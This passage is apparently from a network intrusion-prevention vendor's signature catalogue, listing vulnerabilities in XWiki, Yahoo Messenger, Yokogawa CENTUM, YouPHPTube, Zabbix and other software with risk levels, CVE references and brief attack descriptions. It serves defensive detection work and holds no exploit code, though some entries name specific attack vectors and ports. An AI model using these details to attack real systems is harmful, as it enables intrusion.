Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1612-5242
Last changed: sgpkg-ips-1612-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Improper input validation in the SchedulerJobSheet component causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection
References:
CVE-2023-29524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29524
Back to top

Xwiki.org-Xwiki-Searchadmin-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1694-5242
Last changed: sgpkg-ips-1694-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability has been reported for XWiki.org XWiki. The vulnerability is due to a lack of input validation when when handling documents containing search user interface extensions. A remote, authenticated attacker can exploit this vulnerability by editing a document to contain an object with a maliciously crafted parameters. Successful exploitation could result in arbitrary code execution in the context of the application.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Searchadmin-Code-Injection
References:
CVE-2023-50721
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50721
Back to top

Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability have been reported in XWiKi. The vulnerability is due to improper input validation when rendering page name values. A remote, authenticated attacker can exploit this vulnerability by sending a request to the target server for a non-existent page with a crafted name. Successful exploitation could result in arbitrary code injection.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection
References:
CVE-2023-37462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37462
Back to top

Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: High
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability has been reported for XWiki.org XWiki. This vulnerability is due to a lack of input validation when handling space titles. A remote, authenticated attacker can exploit this vulnerability by creating a document containing a maliciously crafted title on the target server. Successful exploitation could result in arbitrary code execution in the context of the application.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection
References:
CVE-2024-31984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31984
Back to top

Xwiki.org-Xwiki-Tags-Code-Injection

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1519-5242
Last changed: sgpkg-ips-1519-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Insufficient validation of tags in a request causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CSU-Xwiki.org-Xwiki-Tags-Code-Injection
References:
CVE-2022-36100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36100
Back to top

Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection

About this vulnerability: A vulnerability in XWiki.
Risk: High
First detected in: sgpkg-ips-1573-5242
Last changed: sgpkg-ips-1573-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A vulnerability in XWiki, verions prior to 13.10.11, XWiki prior to 14.10, and XWiki prior to 14.4.7, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to insufficient validation of user data used in annotations.
Situation: HTTP_CRL-Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection
References:
CVE-2023-26475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26475
Back to top

Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection

About this vulnerability: A vulnerability in XWiki
Risk: Moderate
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: A code injection vulnerability has been reported for XWiki. The vulnerability is due to a lack of input validation when handling UIExtension objects. A remote, authenticated attacker can exploit this vulnerability by editing a document to contain an object with maliciously crafted parameters. Successful exploitation could result in arbitrary code execution in the context of the application.
Situation: HTTP_CRL-Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection
References:
CVE-2024-31997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31997
Back to top

Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in XWiki.org XWiki
Risk: Moderate
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Platform: Generic
Software: XWiki
Type: Input Validation
Description: Insufficient input validation when changing a user profile's time zone setting causes a cross-site scripting vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting
References:
CVE-2023-40176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40176
Back to top

Xymon-Daemon-Gather-Information

About this vulnerability: A vulnerability in Xymon Daemon.
Risk: High
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Platform: Generic
Software: Xymon
Type: Insecure Configuration
Description: A vulnerability in Xymon, versions before 4.3.25, which allows remote attackers to read arbitrary files in the configuration directory via a config command.
Situation: Generic_CS-Xymon-Daemon-Gather-Information
References:
CVE-2016-2055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2055
Back to top

Xymon-Useradm-Command-Execution

About this vulnerability: A vulnerability in Xymon
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix; Solaris; BSD
Software: Xymon
Type: Input Validation
Description: A vulnerability in Xymon, versions before 4.3.25, which allows remote attackers to execute arbitrary code due to the insufficient validation of the USERNAME and PASSWORD parameters.
Situation: HTTP_CSU-Xymon-Useradm-Command-Execution
References:
CVE-2016-2056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2056
Back to top

YaBB-Cgi-Information-Retrieval

About this vulnerability: A file disclosure vulnerability in YaBB
Risk: Moderate
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: YaBB Bulletin Board
Type: Metacharacter Injection
Description: There exists a file disclosure vulnerability in some versions of YaBB Bulletin Board software.
Situation: HTTP_CSU-YaBB-Cgi-Information-Retrieval
References:
CVE-2000-0853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0853
BID-1668
http://www.securityfocus.com/bid/1668
OSVDB-411
http://www.osvdb.org/411
Back to top

Yahoo!-Messenger-CYFT-ActiveX-Control-File-Download

About this vulnerability: Arbitary file download vulnerability in Yahoo! Messenger
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: Yahoo Messenger
Type: Malfunction
Description: There is an absolute path vulnerability in Yahoo! Messenger ActiveX control. The vulnerability allows arbitary file download, allowing code execution in the context of the current user.
Situation: HTTP_SS-Yahoo!-Messenger-CYFT-ActiveX-Control-File-Download
References:
CVE-2007-5017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5017
BID-25727
http://www.securityfocus.com/bid/25727
OSVDB-38296
http://www.osvdb.org/38296
Back to top

Yahoo!-Messenger-File-Transfer-Filename-Spoofing

About this vulnerability: A vulnerability in Yahoo! Messenger
Risk: High
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Yahoo Messenger
Type: Input Validation
Description: There is a vulnerability in the way Yahoo! Messenger displays file names in the file transfer dialog. The product displays only a portion of an overly long filename. An attacker can exploit this flaw to mislead a user into downloading a malicious executable program. For example, from the truncated filename, a user may believe that he is receiving an image when in fact it is a program.
Situation: Generic_SS-Yahoo!-Messenger-File-Transfer-Filename-Spoofing
References:
CVE-2005-0243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0243
BID-12587
http://www.securityfocus.com/bid/12587
Back to top

Yahoo!-Messenger-Webcam-Upload-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability: Stack buffer overflow vulnerability in Yahoo! Messenger
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Yahoo Messenger
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Yahoo! Messenger. The vulnerability can be exploited remotely to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_SS-Yahoo!-Messenger-YWcUpl.WcUpload-ActiveX-Control-Exploit
File-Text_Yahoo!-Messenger-YWcUpl.WcUpload-ActiveX-Control-Exploit
References:
CVE-2007-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3147
BID-24341
http://www.securityfocus.com/bid/24341
BID-24354
http://www.securityfocus.com/bid/24354
Back to top

Yahoo!-Messenger-Webcam-Viewer-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability: Stack buffer overflow vulnerability in Yahoo! Messenger
Risk: High
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Yahoo Messenger
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Yahoo! Messenger. The vulnerability can be exploited remotely to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_SS-Yahoo!-Messenger-YWcVwr.WcViewer-ActiveX-Control-Exploit
File-Text_Yahoo!-Messenger-YWcVwr.WcViewer-ActiveX-Control-Exploit
References:
CVE-2007-3148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3148
BID-24341
http://www.securityfocus.com/bid/24341
BID-24355
http://www.securityfocus.com/bid/24355
OSVDB-37081
http://www.osvdb.org/37081
Back to top

Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability: Multiple buffer overflow vulnerabilities in Yahoo! Messenger
Risk: High
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Yahoo Messenger
Type: Malfunction
Description: There is a buffer overflow vulnerability in an ActiveX control included in Yahoo! Messenger. This may lead to code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows
File-Text_Yahoo!-Messenger-YVerInf-ActiveX-Control-Buffer-Overflows
References:
CVE-2007-4515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4515
BID-25494
http://www.securityfocus.com/bid/25494
OSVDB-37739
http://www.osvdb.org/37739
Back to top

Yahoo!-Widgets-YDP-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Yahoo! Widgets
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: Yahoo! Widgets
Type: Buffer Overflow
Description: Yahoo! Widgets has a buffer overflow vulnerability in the YDPCTL.YDPControl ActiveX control due to a boundary error when processing the GetComponentVersion method. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.
Situation: HTTP_SS-Yahoo!-Widgets-YDP-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-4034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4034
BID-25086
http://www.securityfocus.com/bid/25086
OSVDB-37705
http://www.osvdb.org/37705
Back to top

Yahoo-Instant-Messenger-Network-Usage

About this vulnerability: Yahoo instant messenger network usage
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1555-5242
Platform: Generic
Software: Yahoo Messenger
Type: Instant Messenger
Description: Yahoo Messenger is an instant messenger that can be used to send messages and share files among users.
Back to top

Yahoo-Messenger-ActiveX-Control-Command-Execution

About this vulnerability: A code execution vulnerability in Yahoo Messenger WScript.Shell ActiveX control
Risk: High
First detected in: sgpkg-ips-325-4219
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: Yahoo Messenger
Type: Malfunction
Description: There is a remote code execution vulnerability in Yahoo Messenger WScript.Shell ActiveX control. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-Yahoo-Messenger-ActiveX-Control-Command-Execution
Back to top

Yahoo-WebMessenger-Usage

About this vulnerability: Yahoo WebMessenger usage
Risk: Moderate
First detected in: sgpkg-ips-128-2032
Last changed: sgpkg-ips-1555-5242
Platform: Generic
Software: Yahoo Messenger
Type: Instant Messenger
Description: Yahoo WebMessenger is a web service which allows users to connect to other Yahoo Messenger users through a web interface.
Back to top

Yaws-Web-Server-Directory-Traversal

About this vulnerability: A Yaws Web Server Directory Traversal vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Yaws Web Server
Type: Directory Traversal
Description: A vulnerability in Yaws Web Server which allows remote attackers to read arbitrary files via directory traversal.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2011-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4350
OSVDB-77581
http://www.osvdb.org/77581
Back to top

Yealink-Device-Management-Command-Injection-CVE-2021-27561

About this vulnerability: A vulnerability in Yealink Device Management
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Generic
Software: Yealink
Type: Input Validation
Description: A command injection vulnerability has been reported in Yealink Device Management. A successful exploitation of this vulnerability can allow a remote, unauthenticated attacker to execute arbitrary commands on the affected system.
Situation: HTTP_CRL-Yealink-Device-Management-Command-Injection-CVE-2021-27561
References:
CVE-2021-27561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561
Back to top

Yokogawa-CENTUM-CS3000-BKBCopyD.exe-Stack-Based-Buffer-Overflow

About this vulnerability: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKBCopyD.exe
Risk: High
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: Yokogawa CENTUM
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKBCopyD.exe that allows remote attackers to execute arbitrary code via a crafted TCP packet.
Situation: Generic_CS-Yokogawa-CENTUM-CS3000-BKBCopyD.exe-Stack-Based-Buffer-Overflow
References:
CVE-2014-0784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0784
BID-66114
http://www.securityfocus.com/bid/66114
Back to top

Yokogawa-CENTUM-CS3000-BKFSim_vhfd.exe-Stack-Based-Buffer-Overflow

About this vulnerability: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKFSim_vhfd.exe
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: Yokogawa CENTUM
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKFSim_vhfd.exe that allows remote attackers to execute arbitrary code via a crafted packet. FCS/Test Function must be enabled.
Situation: Generic_UDP-Yokogawa-CENTUM-CS3000-BKFSim_vhfd.exe-Stack-Based-Buffer-Overflow
References:
CVE-2014-3888
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3888
OSVDB-108756
http://www.osvdb.org/108756
Back to top

Yokogawa-CENTUM-CS3000-BKHOdeq.exe-Stack-Based-Buffer-Overflow

About this vulnerability: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKHOdeq.exe
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3; Windows 2003 SP2
Software: Yokogawa CENTUM
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKHOdeq.exe that allows remote attackers to execute arbitrary code via a crafted TCP packet.
Situation: Generic_CS-Yokogawa-CENTUM-CS3000-BKHOdeq.exe-Stack-Based-Buffer-Overflow
References:
CVE-2014-0783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0783
BID-66111
http://www.securityfocus.com/bid/66111
Back to top

Yokogawa-CENTUM-Denial-Of-Service

About this vulnerability: Yokogawa CENTUM CS 3000 Remote Denial of Service
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Yokogawa CENTUM
Type: Buffer Overflow
Description: A vulnerability in Wokogawa CENTUM allowing remote attackers to crash the system resulting in a denial of service condition.
Situation: Shared-UDP_Yokogawa-CENTUM-Denial-Of-Service
References:
CVE-2014-0781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0781
BID-66130
http://www.securityfocus.com/bid/66130
Back to top

Yokogawa-CS3000-Buffer-Overflow

About this vulnerability: A Yokogawa CS3000 Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Yokogawa CENTUM
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Yokogawa CS3000, version R3.08.50, which allows remote attackers to execute arbitrary code by sending a specially crafted packet to port 34205.
Situation: Generic_CS-Yokogawa-CS3000-Buffer-Overflow
References:
CVE-2014-0782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0782
Back to top

YoungZSoft-CCProxy-Connect-Buffer-Overflow

About this vulnerability: A vulnerability in YoungZSoft CCProxy
Risk: High
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: YoungZSoft CCProxy
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Youngzsoft CCProxy. The flaw is due to improper processing of the CONNECT request sent to the server. Remote attackers could exploit this vulnerability by sending CONNECT requests with specially crafted parameter. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process. In a sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected application. In an attack case where code injection is not successful, the affected application may terminate abnormally.
Situation: HTTP_CS-YoungZSoft-CCProxy-Connect-Buffer-Overflow
References:
CVE-2008-6415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6415
BID-31416
http://www.securityfocus.com/bid/31416
Back to top

YoungZSoft-CCProxy-Ping-Hostname-Buffer-Overflow

About this vulnerability: A vulnerability in YoungZSoft CCProxy
Risk: High
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: YoungZSoft CCProxy
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in YoungZSoft CCProxy. The vulnerability is due to insufficient input validation with the ping command. A remote attacker may issue a ping command with an excessively long hostname parameter, which exceeds a fixed buffer. Successful exploitation may allow code execution in the context of the CCProxy service.
Situation: Telnet_CTS-YoungZSoft-CCProxy-Ping-Hostname-Buffer-Overflow
References:
CVE-2004-2685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2685
Back to top

YoungZSoft-CMailServer-CMailCOM-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Youngzsoft CMailServer
Risk: Moderate
First detected in: sgpkg-ips-166-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Youngzsoft CMailServer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Youngzsoft CMailServer. An authenticated attacker can send a crafted HTTP request to terminate the IIS service, causing a denial of service condition, or execute arbitrary code with the privileges of the vulnerable service, which is normally the System.
Situation: HTTP_CRL-YoungZSoft-CMailServer-CMailCOM-ActiveX-Control-Buffer-Overflow
References:
BID-30098
http://www.securityfocus.com/bid/30098
Back to top

YouPHPTube-Checkconfiguration.php-Remote-Code-Execution

About this vulnerability: A vulnerability in YouPHPTube
Risk: Moderate
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: YouPHPTube
Type: Malfunction
Description: There exists an access control vulnerability in YouPHPTube due to an input validation issue. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-YouPHPTube-Checkconfiguration.php-Remote-Code-Execution
References:
CVE-2019-16124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16124
Back to top

YouPHPTube-Encoder-Getimage.php-Command-Injection

About this vulnerability: A vulnerability in YouPHPTube Encoder
Risk: Moderate
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: YouPHPTube Encoder
Type: Input Validation
Description: There exist a pre-auth input validation vulnerability in the YouPHPTube Encoder. This vulnerability could be remotely exploited. Successful exploitation could lead in remote code execution.
Situation: HTTP_CSU-YouPHPTube-Encoder-Getimage.php-Command-Injection
References:
CVE-2019-5127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5127
Back to top

YouPHPTube-Encoder-Getimagemp4.php-Command-Injection

About this vulnerability: A vulnerability in YouPHPTube Encoder
Risk: Moderate
First detected in: sgpkg-ips-1204-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: YouPHPTube Encoder
Type: Input Validation
Description: There exists a pre-auth input validation vulnerability in the YouPHPTube Encoder. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSU-YouPHPTube-Encoder-Getimagemp4.php-Command-Injection
References:
CVE-2019-5128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5128
Back to top

YouPHPTube-Encoder-Getspiritsfromvideo.php-Command-Injection

About this vulnerability: A vulnerability in YouPHPTube Encoder
Risk: Moderate
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: YouPHPTube Encoder
Type: Input Validation
Description: There exist a pre-auth input validation vulnerability in the YouPHPTube Encoder. This vulnerability could be remotely exploited. Successful exploitation could lead in remote code execution.
Situation: HTTP_CRL-YouPHPTube-Encoder-Getspiritsfromvideo.php-Command-Injection
References:
CVE-2019-5129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5129
Back to top

YouPHPTube-SQL-Injection-Vulnerability

About this vulnerability: A vulnerability in Youphptube
Risk: High
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: YouPHPTube
Type: Malfunction
Description: There exists an SQL vulnerability in YouPHPTube. Successful exploitation could lead in arbitrary SQL code execution.
Situation: HTTP_CRL-YouPHPTube-SQL-Injection-Vulnerability
References:
CVE-2019-14430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14430
Back to top

Your-Freedom-Network-Usage

About this vulnerability: Your Freedom network usage
Risk: Moderate
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Your Freedom
Type: Insecure Configuration
Description: Your Freedom is a virtual private network solution designed to allow unrestricted internet access. The traffic between the client and the Your Freedom servers may be encrypted in order to avoid inspection.
Situation: Generic_UDP-Your-Freedom-UDP-Packet
DNS-UDP_Your-Freedom-Network-Query
HTTP_CSH-Your-Freedom-HTTP-Request
FTP_SS-Your-Freedom-FTP-Packet
HTTP_SS-Your-Freedom-Network-Response
HTTP_SS-Your-Freedom-Cgi-Response
TFTP_UDP-Your-Freedom-UDP-Packet
TLS-SNI_Your-Freedom-Network-Query
HTTP_SHS-Your-Freedom-Network-Response
File-Text_Your-Freedom-Cgi-Response
File-Text_Your-Freedom-HTTP-Response
Back to top

YouTube

About this vulnerability: YouTube
Risk: Low
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Youtube
Type: Browser
Description: Youtube is an video service that allows its users to share videos online.
Situation: HTTP_CSH-YouTube-Access
Back to top

YPOPS-Buffer-Overflow

About this vulnerability: A YPOPS Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: YPOPS
Type: Buffer Overflow
Description: A buffer overflow vulnerability in YPOPS, versions 0.4 through 0.6, which allows remote attackers to cause a denial of service condition, or execute arbitrary code, via a long POP3 USER command or SMTP request.
Situation: SMTP_CS-YPOPS-Buffer-Overflow
References:
CVE-2004-1558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1558
BID-11256
http://www.securityfocus.com/bid/11256
OSVDB-10367
http://www.osvdb.org/10367
Back to top

Ysoserial-Generated-DotNet-Serialized-Object

About this vulnerability: .NET serialized object with Ysoserial gadget chain characteristics detected
Risk: High
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1800-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: A .NET serialized object that possibly contains a known Ysoserial gadget chain was detected. This situation may indicate an attempt to exploit an unsafe deserialization vulnerability.
Situation: HTTP_CS-Ysoserial-Generated-DotNet-Serialized-Object-In-A-MSMQ-Message
File-Text_Ysoserial-Generated-DotNet-Serialized-Object
HTTP_CRL-Ysoserial-Generated-DotNet-Serialized-Object
Generic_CS-Ysoserial-Generated-DotNet-Serialized-Object
File-Binary_Ysoserial-Generated-DotNet-Serialized-Object
File-TextId_Ysoserial-Generated-DotNet-Serialized-Object
Back to top

Ysoserial-Generated-Java-Serialized-Object

About this vulnerability: Ysoserial generated Java serialized object
Risk: Moderate
First detected in: sgpkg-ips-1540-5242
Last changed: sgpkg-ips-1560-5242
Platform: Any Operating System
Software: Any Software
Type: Input Validation
Description: A Java serialized object that contains a known Ysoserial gadget chain was detected. This situation may indicate an attempt to exploit an unsafe deserialization vulnerability.
Situation: File-Text_Suspicious-Java-Serialized-Object
HTTP_CRL_Suspicious-Java-Serialized-Object
Generic_CS-Suspicious-Java-Serialized-Object
File-Binary_Suspicious-Java-Serialized-Object
File-TextId_Suspicious-Java-Serialized-Object
Back to top

Z-Scada-Net2.0-0-Day

About this vulnerability: Z-Scada Net2.0 Buffer Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Z-Scada Net 2.0
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Z-Scada Net2.0 that could lead to remote code execution.
Situation: Generic_SS-Z-Scada-Net2.0-0-Day
Back to top

Zabbix-Addrelatedobjects-SQL-Injection-CVE-2024-42327

About this vulnerability: A vulnerability in Zabbix
Risk: High
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Zabbix. The vulnerability is due to improper input validation in the addRelatedObjects method. A remote, authenticated user could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: File-Text_Zabbix-Addrelatedobjects-SQL-Injection-CVE-2024-42327
References:
CVE-2024-42327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42327
Back to top

Zabbix-Agent-Command-Injection

About this vulnerability: A Zabbix Agent Command Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: A vulnerability in Zabbix Agent, versions 1.6.7 and before, which allows remote attackers to execute arbitrary commands via shell metacharacters in the argument to net.tcp.listen.
Situation: Generic_CS-Zabbix-Agent-Command-Injection
References:
CVE-2009-4502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4502
OSVDB-60956
http://www.osvdb.org/60956
Back to top

Zabbix-Arbitrary-Command-Execution

About this vulnerability: A Zabbix Arbitrary Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: A vulnerability in Zabbix, versions 1.6.9 and before, which allows remote attackers to execute arbitrary commands by sending a specially crafted request to the node_process_command() function.
Situation: Generic_CS-Zabbix-Arbitrary-Command-Execution
References:
CVE-2009-4498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4498
BID-37989
http://www.securityfocus.com/bid/37989
OSVDB-60965
http://www.osvdb.org/60965
Back to top

Zabbix-Audit-Log-SQL-Injection-CVE-2024-22120

About this vulnerability: A vulnerability in Zabbix
Risk: High
First detected in: sgpkg-ips-1739-5242
Last changed: sgpkg-ips-1739-5242
Platform: Generic
Software: Zabbix
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Zabbix. The vulnerability is due to improper input validation of the "clientip" field. A remote, authenticated user could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: Generic_CS-Zabbix-Audit-Log-SQL-Injection-CVE-2024-22120
References:
CVE-2024-22120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22120
Back to top

Zabbix-Authenticated-Remote-Command-Execution

About this vulnerability: Zabbix Authenticated Remote Command Execution
Risk: Moderate
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Zabbix
Type: Code Injection
Description: There is a remote command execution vulnerability in Zabbix. An authenticated user can fool the system to running arbitrary scripts on the target.
Situation: HTTP_CRL-Zabbix-Authenticated-Remote-Command-Execution
References:
CVE-2013-3628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3628
Back to top

Zabbix-Geomap-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in ZABBIX ZABBIX
Risk: Moderate
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Platform: Generic
Software: Zabbix
Type: Malfunction
